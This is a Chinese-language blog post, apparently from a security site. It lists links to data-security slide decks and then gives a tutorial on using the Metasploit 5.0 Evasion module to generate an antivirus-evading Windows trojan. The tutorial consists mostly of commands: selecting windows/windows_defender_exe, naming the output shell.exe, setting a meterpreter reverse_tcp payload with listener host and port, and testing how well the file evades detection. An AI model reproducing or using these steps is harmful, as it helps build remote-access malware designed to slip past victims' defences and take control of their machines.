今日更新PPT內容11個,內容:

資料安全,

CASB保護零信任環境的資料安全實踐:

https://www。

secshi。com/39625。html

以資料為中心的人工智慧時代資料安全和隱私保護戰略動力-GDPR的影響和對策:

https://www。

secshi。com/39547。html

資料安全的冰與火之歌 從 GDPR 看企業資料安全合規建設:

https://www。

secshi。com/39457。html

業務流量資料安全應用實踐:

https://www。

secshi。com/39409。html

企業資料安全合規之路:

https://www。

secshi。com/39203。html

業務資料安全實踐:

https://www。

secshi。com/39189。html

攻防對抗中資料安全的持續最佳化:

https://www。

secshi。com/39175。html

加快工業網際網路資料安全能力建設 切實護航我國製造業高質量發展:

https://www。

secshi。com/39153。html

AiLPHA大資料安全分析應用於醫療網路安全閉環的實踐:

https://www。

secshi。com/39145。html

資料安全的若干誤解:

https://www。

secshi。com/39115。html

資料安全保障工程:

https://www。

secshi。com/39113。html

前言

Metasploit 5。0的時候更新一個Evasion模組,這個模組能非常快捷的生成反防毒軟體的木馬,注意!低於5。0以下的版本是沒有Evasion模組的,所以需要手動更新Metasploit

Metasploit更新

如果是使用kail的同學就直接使用msfupdate就能進行更新,如果是使用別的系統的小夥伴就請進入到Metasploit目錄下面的bin目錄下面,執行msfupdate

利用

開啟metasploit

利用Metasploit製作免殺程式

檢視evasion模組

利用Metasploit製作免殺程式

這裡我們選擇第五個模組

use windows/windows_defender_exe

利用Metasploit製作免殺程式

檢視需要配置的引數

show options

利用Metasploit製作免殺程式

可以看到只有一個檔名的引數可以配置,我們就修改為shell。exe吧

利用Metasploit製作免殺程式

緊接著我們要配置回顯payload

set payload windows/meterpreter/reverse_tcp

set lhost you-ip

set lport 4444

利用Metasploit製作免殺程式

使用exploit或者run 執行

利用Metasploit製作免殺程式

看到回顯資訊我們可以看到木馬存放在/root/。msf4/local/下面

我們來檢測一下免殺效果

利用Metasploit製作免殺程式

利用Metasploit製作免殺程式

來自安全師作者GEIT,部落格地址:

http://www。

geit。work/

http://

weixin。qq。com/r/7CmPi2b

Eca4NKSLob3xo

(二維碼自動識別)